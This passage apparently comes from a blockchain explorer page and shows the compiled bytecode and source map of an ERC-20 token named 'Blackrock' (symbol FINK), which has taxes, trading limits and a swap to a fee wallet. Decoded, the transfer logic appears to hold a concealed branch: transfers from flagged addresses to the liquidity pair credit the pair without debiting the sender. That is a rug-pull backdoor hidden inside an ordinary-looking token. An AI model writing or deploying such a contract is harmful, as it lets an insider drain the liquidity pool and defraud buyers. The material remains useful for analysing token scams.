8d9085815260200190565b60405180910390a35b6001600160a01b0384166000908152600360205260409020546111b99083611364565b6001600160a01b0385166000908152600360205260409020556111fe6111df8383611364565b6001600160a01b03851660009081526003602052604090205490611520565b6001600160a01b0380851660008181526003602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6112488585611364565b60405190815260200160405180910390a350505050565b600081848411156112835760405162461bcd60e51b81526004016104a191906115ad565b50600061129084866118ab565b95945050505050565b6000826000036112ab575060006103e8565b60006112b783856117df565b9050826112c485836118be565b1461131b5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016104a1565b9392505050565b600061131b83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061157f565b600061131b83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061125f565b600e805460ff60a81b1916600160a81b17905560408051600280825260608201835260009260208301908036833701905050905030816000815181106113ee576113ee6118e0565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611447573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061146b919061182b565b8160018151811061147e5761147e6118e0565b6001600160a01b0392831660209182029290920101526001546114a49130911684610adc565b60015460405163791ac94760e01b81526001600160a01b039091169063791ac947906114dd9085906000908690309042906004016118f6565b600060405180830381600087803b1580156114f757600080fd5b505af115801561150b573d6000803e3d6000fd5b5050600e805460ff60a81b1916905550505050565b60008061152d8385611898565b90508381101561131b5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104a1565b600081836115a05760405162461bcd60e51b81526004016104a191906115ad565b50600061129084866118be565b600060208083528351808285015260005b818110156115da578581018301518582016040015282016115be565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461161057600080fd5b50565b6000806040838503121561162657600080fd5b8235611631816115fb565b946020939093013593505050565b60008060006060848603121561165457600080fd5b833561165f816115fb565b9250602084013561166f816115fb565b929592945050506040919091013590565b60006020828403121561169257600080fd5b813561131b816115fb565b600080604083850312156116b057600080fd5b82356116bb816115fb565b915060208301356116cb816115fb565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b600181815b8085111561172757816000190482111561170d5761170d6116d6565b8085161561171a57918102915b93841c93908002906116f1565b509250929050565b60008261173e575060016103e8565b8161174b575060006103e8565b8160018114611761576002811461176b57611787565b60019150506103e8565b60ff84111561177c5761177c6116d6565b50506001821b6103e8565b5060208310610133831016604e8410600b84101617156117aa575081810a6103e8565b6117b483836116ec565b80600019048211156117c8576117c86116d6565b029392505050565b600061131b60ff84168361172f565b80820281158282048414176103e8576103e86116d6565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60006020828403121561183d57600080fd5b815161131b816115fb565b60008060006060848603121561185d57600080fd5b8351925060208401519150604084015190509250925092565b60006020828403121561188857600080fd5b8151801515811461131b57600080fd5b808201808211156103e8576103e86116d6565b818103818111156103e8576103e86116d6565b6000826118db57634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156119465784516001600160a01b031683529383019391830191600101611921565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212202491386721b974d50fd999d3bae86185fc3fb261dd48da75ecfce32e560e2b9664736f6c63430008130033

Deployed Bytecode

0x6080604052600436106101235760003560e01c806395d89b41116100a0578063c876d0b911610064578063c876d0b914610330578063c9567bf914610351578063dd62ed3e14610366578063e884f260146103ac578063f8f3c5a9146103c157600080fd5b806395d89b41146102a257806398f235fe146102cf578063a9059cbb146102e5578063b155a05414610305578063bf474bed1461031a57600080fd5b80636c0a24eb116100e75780636c0a24eb1461020257806370a0823114610218578063715018a61461024e578063751039fc146102655780638da5cb5b1461027a57600080fd5b806306fdde031461012f578063095ea7b31461017357806318160ddd146101a357806323b872dd146101c6578063313ce567146101e657600080fd5b3661012a57005b600080fd5b34801561013b57600080fd5b50604080518082019091526009815268426c61636b726f636b60b81b60208201525b60405161016a91906115ad565b60405180910390f35b34801561017f57600080fd5b5061019361018e366004611613565b6103d7565b604051901515815260200161016a565b3480156101af57600080fd5b506101b86103ee565b60405190815260200161016a565b3480156101d257600080fd5b506101936101e136600461163f565b61040e565b3480156101f257600080fd5b506040516012815260200161016a565b34801561020e57600080fd5b506101b8600a5481565b34801561022457600080fd5b506101b8610233366004611680565b6001600160a01b031660009081526003602052604090205490565b34801561025a57600080fd5b50610263610477565b005b34801561027157600080fd5b506102636104f4565b34801561028657600080fd5b506000546040516001600160a01b03909116815260200161016a565b3480156102ae57600080fd5b5060408051808201909152600481526346494e4b60e01b602082015261015d565b3480156102db57600080fd5b506101b8600b5481565b3480156102f157600080fd5b50610193610300366004611613565b610633565b34801561031157600080fd5b50610263610640565b34801561032657600080fd5b506101b8600c5481565b34801561033c57600080fd5b50600e5461019390600160b81b900460ff1681565b34801561035d57600080fd5b506102636106ad565b34801561037257600080fd5b506101b861038136600461169d565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b3480156103b857600080fd5b50610263610a74565b3480156103cd57600080fd5b506101b860095481565b60006103e4338484610adc565b5060015b92915050565b60006103fc6012600a6117d0565b61040990629896806117df565b905090565b600061041b848484610c00565b61046d843361046885604051806060016040528060288152602001611968602891396001600160a01b038a166000908152600260209081526040808320338452909152902054919061125f565b610adc565b5060019392505050565b6000546001600160a01b031633146104aa5760405162461bcd60e51b81526004016104a1906117f6565b60405180910390fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600080546001600160a01b0319169055565b6000546001600160a01b0316331461051e5760405162461bcd60e51b81526004016104a1906117f6565b61052a6012600a6117d0565b61053790629896806117df565b6009556105466012600a6117d0565b61055390629896806117df565b600a908155600e805460ff60b81b191690557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf90610593906012906117d0565b6105a090629896806117df565b60405190815260200160405180910390a17ffb1fe1002b7550e87616e67793dbb7d3f437a79c2688c372c66dc170dbcb0efd6105de6012600a6117d0565b6105eb90629896806117df565b60405190815260200160405180910390a1604051600081527f8ac0cb4bc9520a34c87856d204a441aedd0ffcf148414be1fe31e1ad57474022906020015b60405180910390a1565b60006103e4338484610c00565b6000546001600160a01b0316331461066a5760405162461bcd60e51b81526004016104a1906117f6565b6000600781905560088190556040805182815260208101929092527f528d9479e9f9889a87a3c30c7f7ba537e5e59c4c85a37733b16e57c62df613029101610629565b6000546001600160a01b031633146106d75760405162461bcd60e51b81526004016104a1906117f6565b600e54600160a01b900460ff161561073d5760405162461bcd60e51b8152602060048201526024808201527f6f70656e54726164696e673a2054726164696e6720697320616c72656164792060448201526337b832b760e11b60648201526084016104a1565b600180546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556107859030906107786012600a6117d0565b61046890629896806117df565b600160009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156107d8573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107fc919061182b565b6001600160a01b031663c9c6539630600160009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561085e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610882919061182b565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156108cf573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108f3919061182b565b600e80546001600160a01b039283166001600160a01b03199091161790556001541663f305d719473061093b816001600160a01b031660009081526003602052604090205490565b6000806109506000546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156109b8573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906109dd9190611848565b5050600e5460015460405163095ea7b360e01b81526001600160a01b03918216600482015260001960248201529116915063095ea7b3906044016020604051808303816000875af1158015610a36573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a5a9190611876565b50600e805462ff00ff60a01b19166201000160a01b179055565b6000546001600160a01b03163314610a9e5760405162461bcd60e51b81526004016104a1906117f6565b600e805460ff60b81b19169055604051600081527f8ac0cb4bc9520a34c87856d204a441aedd0ffcf148414be1fe31e1ad5747402290602001610629565b6001600160a01b038316610b3e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104a1565b6001600160a01b038216610b9f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104a1565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610c645760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104a1565b6001600160a01b038216610cc65760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104a1565b60008111610d335760405162461bcd60e51b815260206004820152603460248201527f5f7472616e736665723a205472616e7366657220616d6f756e74206d7573742060448201527362652067726561746572207468616e207a65726f60601b60648201526084016104a1565b600080546001600160a01b03858116911614801590610d6057506000546001600160a01b03848116911614155b1561111c57600e54600160b81b900460ff1615610e51576001546001600160a01b03848116911614801590610da35750600e546001600160a01b03848116911614155b15610e5157326000908152600660205260409020544311610e3e5760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a4016104a1565b3260009081526006602052604090204390555b600e546001600160a01b038581169116148015610e7c57506001546001600160a01b03848116911614155b8015610ea157506001600160a01b03831660009081526004602052604090205460ff16155b15610faf57610ec66064610ec06007548561129990919063ffffffff16565b90611322565b9050600954821115610f265760405162461bcd60e51b815260206004820152602360248201527f5f7472616e736665723a204578636565647320746865205f6d617854784c696d60448201526234ba1760e91b60648201526084016104a1565b600a5482610f49856001600160a01b031660009081526003602052604090205490565b610f539190611898565b1115610faf5760405162461bcd60e51b815260206004820152602560248201527f5f7472616e736665723a204578636565647320746865206d617857616c6c657460448201526429b4bd329760d91b60648201526084016104a1565b600e546001600160a01b038481169116148015610fd557506001600160a01b0384163014155b15611055576001600160a01b03841660009081526005602052604090205460ff1615611038576110058282611364565b6001600160a01b0384166000908152600360205260408120805490919061102d908490611898565b909155505050505050565b6110526064610ec06008548561129990919063ffffffff16565b90505b30600090815260036020526040902054600e54600160a81b900460ff1615801561108c5750600e546001600160a01b038581169116145b80156110a15750600e54600160b01b900460ff165b80156110ae5750600b5483115b1561111a57600c5481106110cc576110c7600c546113a6565b6110df565b600b548111156110df576110df816113a6565b600d546040516001600160a01b03909116904780156108fc02916000818181858888f19350505050158015611118573d6000803e3d6000fd5b505b505b8015611196573060009081526003602052604090205461113c9082611520565b30600081815260036020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061118d9085815260200190565b60405180910390a35b6001600160a01b0384166000908152600360205260409020546111b99083611364565b6001600160a01b0385166000908152600360205260409020556111fe6111df8383611364565b6001600160a01b03851660009081526003602052604090205490611520565b6001600160a01b0380851660008181526003602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6112488585611364565b60405190815260200160405180910390a350505050565b600081848411156112835760405162461bcd60e51b81526004016104a191906115ad565b50600061129084866118ab565b95945050505050565b6000826000036112ab575060006103e8565b60006112b783856117df565b9050826112c485836118be565b1461131b5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016104a1565b9392505050565b600061131b83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061157f565b600061131b83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061125f565b600e805460ff60a81b1916600160a81b17905560408051600280825260608201835260009260208301908036833701905050905030816000815181106113ee576113ee6118e0565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611447573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061146b919061182b565b8160018151811061147e5761147e6118e0565b6001600160a01b0392831660209182029290920101526001546114a49130911684610adc565b60015460405163791ac94760e01b81526001600160a01b039091169063791ac947906114dd9085906000908690309042906004016118f6565b600060405180830381600087803b1580156114f757600080fd5b505af115801561150b573d6000803e3d6000fd5b5050600e805460ff60a81b1916905550505050565b60008061152d8385611898565b90508381101561131b5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104a1565b600081836115a05760405162461bcd60e51b81526004016104a191906115ad565b50600061129084866118be565b600060208083528351808285015260005b818110156115da578581018301518582016040015282016115be565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461161057600080fd5b50565b6000806040838503121561162657600080fd5b8235611631816115fb565b946020939093013593505050565b60008060006060848603121561165457600080fd5b833561165f816115fb565b9250602084013561166f816115fb565b929592945050506040919091013590565b60006020828403121561169257600080fd5b813561131b816115fb565b600080604083850312156116b057600080fd5b82356116bb816115fb565b915060208301356116cb816115fb565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b600181815b8085111561172757816000190482111561170d5761170d6116d6565b8085161561171a57918102915b93841c93908002906116f1565b509250929050565b60008261173e575060016103e8565b8161174b575060006103e8565b8160018114611761576002811461176b57611787565b60019150506103e8565b60ff84111561177c5761177c6116d6565b50506001821b6103e8565b5060208310610133831016604e8410600b84101617156117aa575081810a6103e8565b6117b483836116ec565b80600019048211156117c8576117c86116d6565b029392505050565b600061131b60ff84168361172f565b80820281158282048414176103e8576103e86116d6565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60006020828403121561183d57600080fd5b815161131b816115fb565b60008060006060848603121561185d57600080fd5b8351925060208401519150604084015190509250925092565b60006020828403121561188857600080fd5b8151801515811461131b57600080fd5b808201808211156103e8576103e86116d6565b818103818111156103e8576103e86116d6565b6000826118db57634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156119465784516001600160a01b031683529383019391830191600101611921565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212202491386721b974d50fd999d3bae86185fc3fb261dd48da75ecfce32e560e2b9664736f6c63430008130033

Deployed Bytecode Sourcemap

9888:11584:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11937:83;;;;;;;;;;-1:-1:-1;12007:5:0;;;;;;;;;;;;-1:-1:-1;;;12007:5:0;;;;11937:83;;;;;;;:::i;:::-;;;;;;;;14141:161;;;;;;;;;;-1:-1:-1;14141:161:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;14141:161:0;1023:187:1;12536:100:0;;;;;;;;;;;;;:::i;:::-;;;1361:25:1;;;1349:2;1334:18;12536:100:0;1215:177:1;14661:313:0;;;;;;;;;;-1:-1:-1;14661:313:0;;;;;:::i;:::-;;:::i;12344:83::-;;;;;;;;;;-1:-1:-1;12344:83:0;;10167:2;2000:36:1;;1988:2;1973:18;12344:83:0;1858:184:1;10685:58:0;;;;;;;;;;;;;;;;12832:119;;;;;;;;;;-1:-1:-1;12832:119:0;;;;;:::i;:::-;-1:-1:-1;;;;;12925:18:0;12898:7;12925:18;;;:9;:18;;;;;;;12832:119;7159:148;;;;;;;;;;;;;:::i;:::-;;19629:310;;;;;;;;;;;;;:::i;6609:79::-;;;;;;;;;;-1:-1:-1;6647:7:0;6674:6;6609:79;;-1:-1:-1;;;;;6674:6:0;;;2445:51:1;;2433:2;2418:18;6609:79:0;2299:203:1;12130:87:0;;;;;;;;;;-1:-1:-1;12202:7:0;;;;;;;;;;;;-1:-1:-1;;;12202:7:0;;;;12130:87;;10750:61;;;;;;;;;;;;;;;;13233:167;;;;;;;;;;-1:-1:-1;13233:167:0;;;;;:::i;:::-;;:::i;19267:126::-;;;;;;;;;;;;;:::i;10818:58::-;;;;;;;;;;;;;;;;11071:39;;;;;;;;;;-1:-1:-1;11071:39:0;;;;-1:-1:-1;;;11071:39:0;;;;;;20211:1108;;;;;;;;;;;;;:::i;13691:143::-;;;;;;;;;;-1:-1:-1;13691:143:0;;;;;:::i;:::-;-1:-1:-1;;;;;13799:18:0;;;13772:7;13799:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;13691:143;20062:141;;;;;;;;;;;;;:::i;10625:53::-;;;;;;;;;;;;;;;;14141:161;14216:4;14233:39;588:10;14256:7;14265:6;14233:8;:39::i;:::-;-1:-1:-1;14290:4:0;14141:161;;;;;:::o;12536:100::-;12589:7;10227:13;10167:2;10227;:13;:::i;:::-;10216:24;;:8;:24;:::i;:::-;12609:19;;12536:100;:::o;14661:313::-;14759:4;14776:36;14786:6;14794:9;14805:6;14776:9;:36::i;:::-;14823:121;14832:6;588:10;14854:89;14892:6;14854:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;14854:19:0;;;;;;:11;:19;;;;;;;;588:10;14854:33;;;;;;;;;;:37;:89::i;:::-;14823:8;:121::i;:::-;-1:-1:-1;14962:4:0;14661:313;;;;;:::o;7159:148::-;6821:6;;-1:-1:-1;;;;;6821:6:0;588:10;6821:22;6813:67;;;;-1:-1:-1;;;6813:67:0;;;;;;;:::i;:::-;;;;;;;;;7266:1:::1;7250:6:::0;;7229:40:::1;::::0;-1:-1:-1;;;;;7250:6:0;;::::1;::::0;7229:40:::1;::::0;7266:1;;7229:40:::1;7297:1;7280:19:::0;;-1:-1:-1;;;;;;7280:19:0::1;::::0;;7159:148::o;19629:310::-;6821:6;;-1:-1:-1;;;;;6821:6:0;588:10;6821:22;6813:67;;;;-1:-1:-1;;;6813:67:0;;;;;;;:::i;:::-;10227:13:::1;10167:2;10227;:13;:::i;:::-;10216:24;::::0;:8:::1;:24;:::i;:::-;19683:11;:26:::0;10227:13:::1;10167:2;10227;:13;:::i;:::-;10216:24;::::0;:8:::1;:24;:::i;:::-;19720:16;:31:::0;;;19762:20:::1;:28:::0;;-1:-1:-1;;;;19762:28:0::1;::::0;;19806:32:::1;::::0;10227:13:::1;::::0;10167:2:::1;::::0;10227:13:::1;:::i;:::-;10216:24;::::0;:8:::1;:24;:::i;:::-;19806:32;::::0;1361:25:1;;;1349:2;1334:18;19806:32:0::1;;;;;;;19854:34;10227:13;10167:2;10227;:13;:::i;:::-;10216:24;::::0;:8:::1;:24;:::i;:::-;19854:34;::::0;1361:25:1;;;1349:2;1334:18;19854:34:0::1;;;;;;;19904:27;::::0;19925:5:::1;1163:41:1::0;;19904:27:0::1;::::0;1151:2:1;1136:18;19904:27:0::1;;;;;;;;19629:310::o:0;13233:167::-;13311:4;13328:42;588:10;13352:9;13363:6;13328:9;:42::i;19267:126::-;6821:6;;-1:-1:-1;;;;;6821:6:0;588:10;6821:22;6813:67;;;;-1:-1:-1;;;6813:67:0;;;;;;;:::i;:::-;19329:1:::1;19319:7;:11:::0;;;19341:8:::1;:12:::0;;;19369:16:::1;::::0;;5139:25:1;;;5195:2;5180:18;;5173:34;;;;19369:16:0::1;::::0;5112:18:1;19369:16:0::1;4949:264:1::0;20211:1108:0;6821:6;;-1:-1:-1;;;;;6821:6:0;588:10;6821:22;6813:67;;;;-1:-1:-1;;;6813:67:0;;;;;;;:::i;:::-;20277:14:::1;::::0;-1:-1:-1;;;20277:14:0;::::1;;;20276:15;20268:64;;;::::0;-1:-1:-1;;;20268:64:0;;5420:2:1;20268:64:0::1;::::0;::::1;5402:21:1::0;5459:2;5439:18;;;5432:30;5498:34;5478:18;;;5471:62;-1:-1:-1;;;5549:18:1;;;5542:34;5593:19;;20268:64:0::1;5218:400:1::0;20268:64:0::1;20387:15;:104:::0;;-1:-1:-1;;;;;;20387:104:0::1;20438:42;20387:104:::0;;::::1;::::0;;;20574:63:::1;::::0;20591:4:::1;::::0;10227:13:::1;10167:2;10227;:13;:::i;:::-;10216:24;::::0;:8:::1;:24;:::i;20574:63::-;20720:15;;;;;;;;;-1:-1:-1::0;;;;;20720:15:0::1;-1:-1:-1::0;;;;;20720:23:0::1;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;20702:55:0::1;;20766:4;20773:15;;;;;;;;;-1:-1:-1::0;;;;;20773:15:0::1;-1:-1:-1::0;;;;;20773:20:0::1;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;20702:94;::::0;-1:-1:-1;;;;;;20702:94:0::1;::::0;;;;;;-1:-1:-1;;;;;6109:15:1;;;20702:94:0::1;::::0;::::1;6091:34:1::0;6161:15;;6141:18;;;6134:43;6026:18;;20702:94:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;20686:13;:110:::0;;-1:-1:-1;;;;;20686:110:0;;::::1;-1:-1:-1::0;;;;;;20686:110:0;;::::1;;::::0;;;20855:15;::::1;:31;20908:21;20963:4;20983:24;20963:4:::0;-1:-1:-1;;;;;12925:18:0;12898:7;12925:18;;;:9;:18;;;;;;;12832:119;20983:24:::1;21022:1;21038::::0;21054:7:::1;6647::::0;6674:6;-1:-1:-1;;;;;6674:6:0;;6609:79;21054:7:::1;20855:247;::::0;::::1;::::0;;;-1:-1:-1;;;;;;20855:247:0;;;-1:-1:-1;;;;;6547:15:1;;;20855:247:0::1;::::0;::::1;6529:34:1::0;6579:18;;;6572:34;;;;6622:18;;;6615:34;;;;6665:18;;;6658:34;6729:15;;;6708:19;;;6701:44;21076:15:0::1;6761:19:1::0;;;6754:35;6463:19;;20855:247:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;21184:13:0::1;::::0;;21215:15;21177:71:::1;::::0;-1:-1:-1;;;21177:71:0;;-1:-1:-1;;;;;21215:15:0;;::::1;21177:71;::::0;::::1;7285:51:1::0;-1:-1:-1;;7352:18:1;;;7345:34;21184:13:0;::::1;::::0;-1:-1:-1;21177:29:0::1;::::0;7258:18:1;;21177:71:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;21261:11:0::1;:18:::0;;-1:-1:-1;;;;21290:21:0;-1:-1:-1;;;21290:21:0;;;20211:1108::o;20062:141::-;6821:6;;-1:-1:-1;;;;;6821:6:0;588:10;6821:22;6813:67;;;;-1:-1:-1;;;6813:67:0;;;;;;;:::i;:::-;20124:20:::1;:28:::0;;-1:-1:-1;;;;20124:28:0::1;::::0;;20168:27:::1;::::0;-1:-1:-1;1163:41:1;;20168:27:0::1;::::0;1151:2:1;1136:18;20168:27:0::1;1023:187:1::0;15281:335:0;-1:-1:-1;;;;;15374:19:0;;15366:68;;;;-1:-1:-1;;;15366:68:0;;7874:2:1;15366:68:0;;;7856:21:1;7913:2;7893:18;;;7886:30;7952:34;7932:18;;;7925:62;-1:-1:-1;;;8003:18:1;;;7996:34;8047:19;;15366:68:0;7672:400:1;15366:68:0;-1:-1:-1;;;;;15453:21:0;;15445:68;;;;-1:-1:-1;;;15445:68:0;;8279:2:1;15445:68:0;;;8261:21:1;8318:2;8298:18;;;8291:30;8357:34;8337:18;;;8330:62;-1:-1:-1;;;8408:18:1;;;8401:32;8450:19;;15445:68:0;8077:398:1;15445:68:0;-1:-1:-1;;;;;15524:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15576:32;;1361:25:1;;;15576:32:0;;1334:18:1;15576:32:0;;;;;;;15281:335;;;:::o;15894:2744::-;-1:-1:-1;;;;;15982:18:0;;15974:68;;;;-1:-1:-1;;;15974:68:0;;8682:2:1;15974:68:0;;;8664:21:1;8721:2;8701:18;;;8694:30;8760:34;8740:18;;;8733:62;-1:-1:-1;;;8811:18:1;;;8804:35;8856:19;;15974:68:0;8480:401:1;15974:68:0;-1:-1:-1;;;;;16061:16:0;;16053:64;;;;-1:-1:-1;;;16053:64:0;;9088:2:1;16053:64:0;;;9070:21:1;9127:2;9107:18;;;9100:30;9166:34;9146:18;;;9139:62;-1:-1:-1;;;9217:18:1;;;9210:33;9260:19;;16053:64:0;8886:399:1;16053:64:0;16145:1;16136:6;:10;16128:75;;;;-1:-1:-1;;;16128:75:0;;9492:2:1;16128:75:0;;;9474:21:1;9531:2;9511:18;;;9504:30;9570:34;9550:18;;;9543:62;-1:-1:-1;;;9621:18:1;;;9614:50;9681:19;;16128:75:0;9290:416:1;16128:75:0;16216:17;6674:6;;-1:-1:-1;;;;;16343:15:0;;;6674:6;;16343:15;;;;:32;;-1:-1:-1;6647:7:0;6674:6;-1:-1:-1;;;;;16362:13:0;;;6674:6;;16362:13;;16343:32;16339:1807;;;16396:20;;-1:-1:-1;;;16396:20:0;;;;16392:388;;;16455:15;;-1:-1:-1;;;;;16441:30:0;;;16455:15;;16441:30;;;;:62;;-1:-1:-1;16489:13:0;;-1:-1:-1;;;;;16475:28:0;;;16489:13;;16475:28;;16441:62;16437:328;;;16565:9;16536:39;;;;:28;:39;;;;;;16578:12;-1:-1:-1;16528:140:0;;;;-1:-1:-1;;;16528:140:0;;9913:2:1;16528:140:0;;;9895:21:1;9952:2;9932:18;;;9925:30;9991:34;9971:18;;;9964:62;10062:34;10042:18;;;10035:62;-1:-1:-1;;;10113:19:1;;;10106:40;10163:19;;16528:140:0;9711:477:1;16528:140:0;16720:9;16691:39;;;;:28;:39;;;;;16733:12;16691:54;;16437:328;16895:13;;-1:-1:-1;;;;;16887:21:0;;;16895:13;;16887:21;:55;;;;-1:-1:-1;16926:15:0;;-1:-1:-1;;;;;16912:30:0;;;16926:15;;16912:30;;16887:55;:73;;;;-1:-1:-1;;;;;;16947:13:0;;;;;;:9;:13;;;;;;;;16946:14;16887:73;16883:353;;;16993:28;17017:3;16993:19;17004:7;;16993:6;:10;;:19;;;;:::i;:::-;:23;;:28::i;:::-;16981:40;;17058:11;;17048:6;:21;;17040:69;;;;-1:-1:-1;;;17040:69:0;;10395:2:1;17040:69:0;;;10377:21:1;10434:2;10414:18;;;10407:30;10473:34;10453:18;;;10446:62;-1:-1:-1;;;10524:18:1;;;10517:33;10567:19;;17040:69:0;10193:399:1;17040:69:0;17162:16;;17152:6;17136:13;17146:2;-1:-1:-1;;;;;12925:18:0;12898:7;12925:18;;;:9;:18;;;;;;;12832:119;17136:13;:22;;;;:::i;:::-;:42;;17128:92;;;;-1:-1:-1;;;17128:92:0;;10929:2:1;17128:92:0;;;10911:21:1;10968:2;10948:18;;;10941:30;11007:34;10987:18;;;10980:62;-1:-1:-1;;;11058:18:1;;;11051:35;11103:19;;17128:92:0;10727:401:1;17128:92:0;17348:13;;-1:-1:-1;;;;;17342:19:0;;;17348:13;;17342:19;:44;;;;-1:-1:-1;;;;;;17365:21:0;;17381:4;17365:21;;17342:44;17338:214;;;-1:-1:-1;;;;;17410:15:0;;;;;;:9;:15;;;;;;;;17407:70;;;17446:21;:6;17457:9;17446:10;:21::i;:::-;-1:-1:-1;;;;;17429:13:0;;;;;;:9;:13;;;;;:38;;:13;;;:38;;;;;:::i;:::-;;;;-1:-1:-1;;;;;;15894:2744:0:o;17407:70::-;17507:29;17532:3;17507:20;17518:8;;17507:6;:10;;:20;;;;:::i;:29::-;17495:41;;17338:214;17681:4;17632:28;12925:18;;;:9;:18;;;;;;17707:6;;-1:-1:-1;;;17707:6:0;;;;17706:7;:30;;;;-1:-1:-1;17723:13:0;;-1:-1:-1;;;;;17717:19:0;;;17723:13;;17717:19;17706:30;:45;;;;-1:-1:-1;17740:11:0;;-1:-1:-1;;;17740:11:0;;;;17706:45;:75;;;;;17764:17;;17755:6;:26;17706:75;17702:433;;;17830:17;;17806:20;:41;17802:257;;17872:35;17889:17;;17872:16;:35::i;:::-;17802:257;;;17959:17;;17936:20;:40;17933:126;;;18001:38;18018:20;18001:16;:38::i;:::-;18077:10;;:42;;-1:-1:-1;;;;;18077:10:0;;;;18097:21;18077:42;;;;;:10;:42;:10;:42;18097:21;18077:10;:42;;;;;;;;;;;;;;;;;;;;;17702:433;16377:1769;16339:1807;18233:13;;18229:172;;18308:4;18290:24;;;;:9;:24;;;;;;:39;;18319:9;18290:28;:39::i;:::-;18281:4;18263:24;;;;:9;:24;;;;;;;:66;;;;183